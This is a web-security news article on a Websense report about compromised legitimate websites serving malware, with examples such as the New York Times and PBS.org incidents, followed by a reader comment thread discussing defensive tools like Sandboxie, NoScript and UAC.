Web Development

Trusted Web sites: Exploit tool of choice

A new report offers insight into what is happening to Web sites. It is not what most of us want to hear. Michael Kassner explains.

Websense Security Labs provides twice-yearly reports assessing Web-based malware. Their latest report is not encouraging. Here's why:

  • 233 percent growth in the number of malicious sites in the last six months and a 671 percent growth during the last year.
  • 77 percent of Web sites with malicious code are legitimate sites that have been compromised.
  • 95 percent of comments to blogs, chat rooms and message boards are spam or malicious.
  • 57 percent of data-stealing attacks are conducted over the Web.
  • 85 percent of all unwanted emails in circulation contained links to spam sites and/or malicious Web sites.
Data acquisition

Websense uses their ThreatSeeker Network to collect data about compromised Web sites. The network consists of 50 million real-time data-collection points, each capable of monitoring Web and e-mail content for malicious code. The system is powerful enough to scan 40 million Web sites and 10 million e-mail messages per hour.

Threat Webscape

In order to understand what Web sites would be most appealing to cybercriminals, Websense created Threat Webscape. It is their way of classifying Web sites with regards to malware threats. They group Web sites into one of three classifications:

  • The 100 most-visited Web sites, usually "Social Networking" or "Search" sites.
  • The next million most-visited sites, primarily current event and news sites.
  • The remaining Web sites, typically business sites, blogs, and personal Web sites.

The focus needs to be on the 100 most-visited Web sites. They get the traffic, which catches the attention of the bad guys. Also of interest, is what these popular Web sites have in common:

  • More than 47 percent of the top 100 sites support user-generated content.
  • 61 percent of the top 100 sites either host malicious content or contain a masked redirect to lure unsuspecting victims from legitimate sites to malicious sites.
Prominent examples

Websense could not have timed the release of their report better. There have been several examples of high-profile Web sites being compromised this past week. Here is a quote from the New York Times:

"Over the weekend, some visitors to the Web site of The New York Times received a nasty surprise. An unknown person or group sneaked a rogue advertisement onto the site's pages."

As I am writing, Ryan Naraine of ZDNet reported that PBS.org is also similarly compromised:

"Some sections of the popular PBS.org Web site have been hijacked by hackers serving up a cocktail of dangerous exploits."

Both being trusted Web sites raises little suspicion. This makes the two Web sites very effective malware delivery tools.

Web 2.0 the cure and curse

From the above information, we can see that Web sites using Web 2.0 applications comprise almost 50 percent of the top 100 sites. The reason they are popular is the ability for anyone to create content that can be viewed by the public. Web sites like Facebook and Twitter are prime examples and we know how successful they are.

Web 2.0 capabilities also increase the chance for abuse. The dynamic nature of Web 2.0 sites create opportunities for cybercriminals to carry out a variety of attacks.

For example, security researcher Ronen Zilberman found a serious vulnerability on the Facebook Web site. If exploited, the vulnerability would allow hackers to steal personal information, pictures, and friend lists from unsuspecting members. Zilberman explains on his blog site that attackers use Cross-Site Request Forgery (CSRF) to trick the visitor's computer into performing actions without the member's knowledge.

On the rise

People accidentally going to malicious Web sites or being directed to one via e-mail messages, are still useful exploit tools. But, compromising for-real Web sites is a win-win situation for cybercriminals. They don't have to worry about suspicious-looking URLs or displayed pages.

Experts are concerned about the number of compromised legitimate Web sites. Nine-ball has infiltrated over 40,000 sites as of June 2009. Gumblar, another exploit has compromised 70,000 Web sites. The following slide (courtesy of Websense) shows how prolific Nine-ball is:

Final thoughts

It stands to reason. Compromising the real thing will always give better results. As users, our only option is to keep computer operating system and application software up-to-date; doing so will prevent malware delivered by compromised Web sites from gaining a foothold.

About

Information is my field...Writing is my passion...Coupling the two is my mission.

56 comments
Ocie3
Ocie3

To quote one of your posts: "For sure, zero-day exploits and those only known to the bad guys will negate any advantage of having up-to-date OSs, applications and anti-malware. But what other options do we have?" Sandboxie: http://www.sandboxie.com/ The home page shows the basic concept of using a "sandbox" in which to execute programs. Any malware that a system acquires is downloaded into the browser's sandbox, from which it cannot escape, and it will be eliminated when the contents of the sandbox are deleted (I have configured Sandboxie to use Sysinternals Secure Delete). The only time that I run Firefox or Thunderbird outside of a sandbox is to update them. It is probably technically possible to update Firefox or Thunderbird while it is running in a sandbox, but there is a risk that the update might not be properly installed. Also, I run I.E. in a sandbox except only on Microsoft's Patch Tuesday, to download and install their patches and fixes. If the MS Windows Update website were compromised by malware, so that it could piggyback on the Windows update, then certainly my computer system would be compromised (and quite likely several million others, too). Installing Sandboxie is easy, and a new user can do well with the default sandbox immediately. Beyond that, configuring Sandboxie requires some time and effort to learn, but the learning curve is not all that steep (especially for an IT pro). [i][b]Caveat[/b][/i]: Sandboxie cannot be used with 64-bit Intel hardware, because the hardware is designed to disallow kernel-mode drivers of any and all kinds. The bad guys cannot install undetectable rootkits, but the good guys cannot sandbox their Internet-facing applications to protect their computers.

Craig_B
Craig_B

Over the weekend, I was checking an email account on Yahoo and when I clicked to view the next message a fake anti-virus popped up. I tried to close the window via a mouse click X and green_av.exe tried to install. Vista UAC was activated and my real anti-virus kicked in, so no damage was done. I should have just killed IE. It was nice to see the UAC kick in, this is the first time I have ever seen it when I was not trying to do an install or admin function. This is really becoming a big problem though when the large sites can't stop this stuff. I guess, keep your OS, Apps, AV, FW, etc up to date. On a side note; I wonder how much computer resources and human resources are devoted just to keep a computer running.

Camarrin
Camarrin

YOU DON'T MENTION HOW TO THWART THE PC TAKEOVER OR HOW YOU ARE TRACKING WHERE THE THREAT IS COMING FROM. WHO IS GOING AFTER THESE "BADGUYS", AND WHY DON'T WE HEAR ABOUT SOME OF THEM BEING ARRESTED.

progan01
progan01

I happened upon a scareware attack for VirusDoctor / Green_AV on a small site. To get rid of the attack, the site disabled all ads. What will be the cumulative impact of this response on revenues for Web businesses? This is no longer an inconvenience; it's a threat to American e-commerce.

santeewelding
santeewelding

You are not retired. You are an agent for the good. Probably armed.

MarkGyver
MarkGyver

UAC seems fairly useful for those that don't want to bother with separate admin/user accounts. However, IE should never have let the program try to run to begin with. Hopefully it was just a bug this time and they'll fix it quickly, unlike the architecture problems in IE before 7.

Michael Kassner
Michael Kassner

I have little experience with UAC, but it has to the way to go. It was good to read a first-hand experience. JCitizen swears by UAC as well. Is it the same on Windows 7? Again, thanks for sharing. My opinion about processes goes way up when trusted TR members give a positive report.

RookieTech
RookieTech

thats wat i like to see a system do is fix lonely hackers bs

Michael Kassner
Michael Kassner

In the final thoughts, I mentioned the only for sure thing that will help and that is to remove any and all vulnerabilities from the computer you are using. No vulnerabilities, no malware. If you read the reports and go to the Websense site, they go into detail about what is being done to prevent further Web servers from getting infected. They aren't really offering any specific sites, as they are allowing them to fix the problem. That way other cybercriminals do not have a chance to attack vulnerable sites. Finding the bad guys is harder than you think. The subverted Web server is usually a stand alone, that only drops a trojan onto the PC. If that is successful, then the PC will phone home to a malware server and get what ever malware the server provides. Edit spelling. I guess I have issues with site and sight.

---TK---
---TK---

First off have you ever ran a web server, or any server with an open port to the world to see? If so, check your logs and you will see that you are being brute forced attacked more than you can possibly imagine. When you track down the IP address alot of the attacks come from china and different parts of Europe... ect... and odds are, is that is some other machine that got taken over. So what do you do? be pro-active create a script that bans IP's after x amount of attempts to log-in and ban for x amount of time... Keep your software updated... and know that security is a figment of your imagination, all it take is time. We do hear some of them being arrested, you just need to keep your ear to the ground... Although it isn't often enough, I do admit.

robo_dev
robo_dev

Thwarting PC takeover is all about malware/virus defense. For example, the firefox add-in called NoScript blocks all scripts, unless you allow them. Scripts can and do install malware. Your AV and anti-spyware protection should be up-to-snuff, too. Last but not least, create a non-admin account on your PC so software (viruses/malware) cannot be installed thru the web browser. Finally, if you're gonna surf nasty sites, use a bootable 'Live' Linux CD-Distro. You cannot infect a read-only OS. Who is going after the bad guys? That's a tough question... everybody and nobody?? Many of these 'bad guys' are in countries in which the US has no power to arrest/prosecute them, and what they do may not even be a crime where they live. And the size/scope/technology of the internet makes it very tricky to track down who is doing what. Sometimes these guys are arrested, but rarely: do a google search on 'spammer arrest' and you get 6 million hits. There is hope.

Michael Kassner
Michael Kassner

For malware developers to attack Web servers as well. The one that I find most fascinating is where the adware is actually on a different server and not being vetted enough. That is what hit the New York Times site.

Ocie3
Ocie3

FWIW, I haven't encountered an issue while running Foxit (to read a .PDF) launched by Firefox in a sandbox. However, I only read, download and store .PDF files; I don't edit or create them. Foxit is simply launched in the same context that Adobe Reader would be launched. Sorry to hear that Sandboxie has issues with printing. I haven't tried to do that either. In the past I have sampled Sanboxie forum posts just to see what sort of problems were reported. It usually is not clear whether Sandboxie itself is the cause of a problem, or perhaps a contributor to it. Sometimes I think that there is such a huge variety in the available computer hardware that it is a wonder that Windows and applications somehow manage to run on most of it, let alone on all of it. Virtual machines appear to to be the latest emerging "mass movement", especially for servers. But I have not become apprised of how that works with regard to whether the integrity of the data is preserved, and whether all of the data acquired by the VM is retained (without being infested with malware or an exploit) when the VM crashes.

JCitizen
JCitizen

Perhaps I can interest him in some good arms? =)

bsauer
bsauer

Once the code has been downloaded into the temp space, along with the good code I might add, IE doesn't control execution. That is up to the operating system.

ultimitloozer
ultimitloozer

The no-hands, invisible installation through IE is an intentional design choice (known in MS parlance as a feature), not a bug. They even snuck this feature into Firefox (via a .NET patch) until they were called on it and allowed the user to disable it in its second incarnation.

Michael Kassner
Michael Kassner

Could you explain what you meant, when you wrote IE should not have let it run. I want to make sure I understand you. Thanks.

RU_Trustified
RU_Trustified

Michael, Is a fully patched system really secure, or simply less vulnerable? Since it will be impossible to remove all vulnerabilities, that means there will always be malware. The bad guys will know about vulnerabilities that the good guys don't know about, so are your assumptions actually correct? Perhaps we should really look at the definition of "trusted" here. I suggest you look up: Reduce Risks With These Guidelines for Updating Internet Server Security Origin: TechRepublic (http://www.techrepublic.com) By: John Pescatore and Edward Younker Date: 24/04/2003 If you are a Gartner customer you can access the 2007 revision for free under the title: Web Server Security Hierarchy This article does discuss what a truly trusted web server looks like. Why is this important? Back in 1998 an NSA paper basically said that without a secure OS, any security efforts in the application layer will eventually fail. So you need technology that works at both levels. You might want to google: "The Inevitability of Failure: The Flawed Assumption of Security in Modern Computing Environments" Now, there is a technology that controls at the OS level and in the app layer and makes sure that nothing in user space can bypass its kernel level behavior enforcement, but I won't mention it here, as I would have to state my disclaimer. :)

santeewelding
santeewelding

Websense "sight"? And, while I'm at it, ".., here's why" at the beginning of the original needs to be its own sentence. Harrumph.

Michael Kassner
Michael Kassner

Are becoming very prevalent as well. I had thought that was pretty much under control.

robo_dev
robo_dev

we would block all traffic from a country that was sending excessive spam/malware. If, for example, there were a threshold that said, 'over 10% spam or virus/malware from your domain and you get shut off'. So, for example, if North Korea was an offender, their internet access gets shut down until they clean up their act. This would force individual ISPs to actually start tracking down and shutting down the scammers/spammers that they support. Every scammer/spammer comes through an ISP of some sort, whether it's a school, government, or commercial ISP. Currently, how many ISPs really go after users who abuse the system? Not many. If that ISP got 'knocked off the air' because of abuse, would they do some house-cleaning? You betcha....

rfolden
rfolden

"For example, the firefox add-in called NoScript blocks all scripts, unless you allow them." True, dat. But have you ever used FireFox for more than about 30 seconds with NoScript turned on? It renders the browser unusable. Another brilliant idea, pooly executed.

Michael Kassner
Michael Kassner

With that. Are you saying that programs can install without any user intervention?

JCitizen
JCitizen

Perhaps we can avoid reporting him as another spammer! I wonder if everyone at Trustifier is as ebullient and entertainingly informative as (s)he and Rob?

RU_Trustified
RU_Trustified

People have been blowing us off for years with that assumption without even looking at the technology. If a technology worked the same way as everything else, the end result could not be expected to work any better, or be considered innovative could it? When you use a technology that uses the language of the business operations and trust relationships within and between groups in the organization, you can make better rules.

RU_Trustified
RU_Trustified

I guess I missed the obvious point. If you don't want to add things inside the kernel, you add them outside, hence a Meta-kernel. It stems from exo-kernel research out of MIT, which examines specific use cases for operating systems etc..

RU_Trustified
RU_Trustified

Nothing to apologize about. Thinking about some of these issues is still in its infancy. Forget about experts in security; you could probably count the real ones on two hands. I would propose that the term "legitimate" Web sites be used rather than trusted be used, as no matter what the intention, many can still be compromised without their knowledge and place customers and visitors to their sites at risk. There are two issues at play here; the integrity of legitimate Web sites and the robustness of the system defenses that Web site viewers have when they visit a compromised site. The more we can eliminate compromise of legitimate Web sites, the less risk there is to visitors of those sites. Then a technology like that of Websense can help sort out the risk of visiting less mainstream sites. As far as the point about patching vulnerabilities being your only option, that is conventional thinking as well. We now have a DoD report that says the leading Red Team (pen test) team in the US military was unable to break systems with our technology on it, despite identified vulnerabilities. Apparently, this is the first time that they ever failed to breach. This technology was created to convert low assurance systems into high assurance, and in order to do that, it must be able to prevent threats from exploiting vulnerabilties, even if they are unknown.

RU_Trustified
RU_Trustified

I had nothing to do with anything that was done with Phirelight. The description of the meta-kernel would have been beyond my technical capability then and probably still now, but that is what it is. I generally write from the mile high view. Would you prefer if we just referred to it as a wrapper technology? What is called is really irrelevant, its what it does that is important. The falling down of previous high assurance systems were that they added new visible objects to the kernel. That meant that what was done on one OS. or even single system, might not be recognizable or replicable on another. Our lead designer hit on the idea of using Discretionary Access Control (DAC) objects found in all operating systems as keys. That way the Trustifier ruleset can be pushed throughout the network to obtain secure enclaves, end-to-end trusted networks or in defense lingo, cross-domain protection. I am not a coder, have no technical training in any way, and my previous description of myself as the accidental tourist of IT security is probably accurate, having fallen into this business quite by accident. My previous career was in health care, looking after seniors. The extent of my computer experience was trying to keep a windows 98 system stable enough to run my kids computer games. I developed no appetite for fiddling and tweaking systems. However, I now have an even bigger distaste for an industry that has managed to accomplish nothing as security has slid towards a state of failure in the 7 years that I have been observing, wasting not millions, but billions of dollars world wide that could be spent on more worthwhile things. I joke that we will be in for a renewal of the kerosene lamp and the barter system when the critical infrastructure goes down, but some days it does not seem funny. Since Guy Kawasaki said "those on the first curve are unable to comprehend, let alone embrace the second curve", I get why a nurse tending to seniors gets it and no one else does. Since one tends to resort to what one knows already, how can anyone in the field resort to anything but the same broken model they know? Someone looking in from the outside can always see things differently, because he is not inflicted with the blinders that gives everyone else tunnel vision. So, if you want to nitpick about writing, go ahead. There are only a handful of us and we have never paid ourselves anything in the 7 years I have been at it. So, if you want to make a difference, and help find solutions, drop on by, we'll find a use for your $25 dollar words.

Michael Kassner
Michael Kassner

I agree to a point. The problem that usually surfaces is that such systems are not flexible enough.

Michael Kassner
Michael Kassner

I have felt that way for a long time, and have heard powerful developers speak of such. Yet we are still in the same place. If you look at history, security in most any endeavor has been playing catch up.

santeewelding
santeewelding

I suspect, given your title, and the similarity to your perambulations here, that you did the writing. Are you saying that when you speak to the world it is no more than marketing? That what you say here is marketing? That when you do not have your nose deep in code you market to me, and cannot be bothered with simulacrum?

RU_Trustified
RU_Trustified

that security is failing because it is simply not addressing the inherent design flaw that is the root cause of security problems. Don't have to believe me. Read the papers, read Ranum. Just because secure trusted systems have not been usable due to poor implementations in the past does not mean that we can ignore reality now. The stakes are getting too high for satisficing. The question is not whether we need them, but how can we make such systems usable, manageable and cost-effective?

RU_Trustified
RU_Trustified

By inserting a rules basis that supercedes normal kernel operations, it is possible to prevent configuration errors from allowing the violation of business operational rules.

RU_Trustified
RU_Trustified

since we spend our time and resources developing cutting edge technologies rather than marketing literature.

Michael Kassner
Michael Kassner

I forget about us. We do tend to create some problems for ourselves.

robo_dev
robo_dev

Nothing is unsinkable.... And don't forget, even the most secure system can be made insecure by a simple human configuration error. I once saw a EAL4-Certified firewall subverted by an automated email spam script. How? The admin pushed a rule change that was a mistake.

santeewelding
santeewelding

Your meta-kernel, as written, amounts to security through the obscurity of overly-long sentences. Bad need of a rewrite.

Michael Kassner
Michael Kassner

I'm the one that harps about defining things and yet I don't. Oops and sorry. My interpretation of a trusted or legitimate Web site is really quite broad. Security experts consider any Web site that is not malicious or nefarious to be trusted or legitimate. The opposite would be the imitation sites or those using slightly different URL addresses. All in the hope of getting people to log in and give up private information. You also have a valid point about vulnerabilities. I tried to cover myself by saying it's our only option. To some extent it is, other than heuristic-style scanners. For sure, zero-day exploits and those only known to the bad guys will negate any advantage of having up-to-date OSs, applications and anti-malware. But what other options do we have?

Michael Kassner
Michael Kassner

I returned your e-mail. I think I have an issue with sight, site, as well as cite. Remember?

RU_Trustified
RU_Trustified

I believe the recent figures are that SQL injections via Web application attacks are the leading means of entry to the database/network.

slam5
slam5

Yeah, if they got knocked off the net;they will be forced to cleanup their machine. I help people with their computers at their home and frequently they don't cleanup until their system is not usable. Honest

Michael Kassner
Michael Kassner

Is that more than likely the computer sending spam and or malware is not that of the criminal, but of an innocent user whose computer got owned.

Ocie3
Ocie3

unwarranted. How can you say that NoScript is "another brilliant idea, poorly executed" if you haven't used it for more than about 30 seconds?? It certainly does not "render the browser unusable"! FYI: I've used NoScript from version 1 onward (i.e., for years). It is easy to use, and it has several other safety features in addition to enabling me to create and maintain the JavaScript whitelist. There are at least two other Firefox add-ons that you can use to control JavaScript execution instead of NoScript. They take little or no particular effort to use, but they also do not, in my opinion, offer the same degree of protection as NoScript (and they don't have other security features that, for example, stop clickjacking): https://addons.mozilla.org/en-US/firefox/search?q=javascript

seanferd
seanferd

You have to allow some things, and make some of those permissions permanent if you visit the relevant sites frequently. The status bar interface is pretty much a no-brainer.

Michael Kassner
Michael Kassner

I trust two applications explicitly, TrueCrypt and NoScript. I have known Giorgio since NoScript was beta. He had a few tough spots, figured them out and is dedicated to keep NoScript viable.

robo_dev
robo_dev

It's true that with NoScript, you often have to hit the 'enable all this page button' when you're on a trusted site, but that's the price you pay for protection. That's not a flaw or program bug, it's just the way that it works. I've seen NoScript block some very nasty drive-by virus/malware infections; ones that were missed by the latest and greatest anti-virus tools. How did I learn this? I forgot to load NoScript on a PC, and it got infected by a nasty nasty virus that was not detected by my AV software. Thankfully I was able to run system restore, then went back and loaded NoScript and re-visited the page that had the drive-by virus infection. BAM, NoScript caught it. It was neat watching the exploit get stopped in it's tracks. It gave a whole page full of scripts that it blocked, showed what hacked web-site was trying to feed me the virus, the whole enchilada. The virus install script consisted of over twenty individual scripts that (would have) modded my registry, installed some executable code, etc. Kinda like smugly picking spent pistol rounds from the bullet-proof vest....

Michael Kassner
Michael Kassner

I know the developer and he would be interested in your problem. I have been using NoScript for years without any problems. It is very active, but I want to know what's going on.

Editor's Picks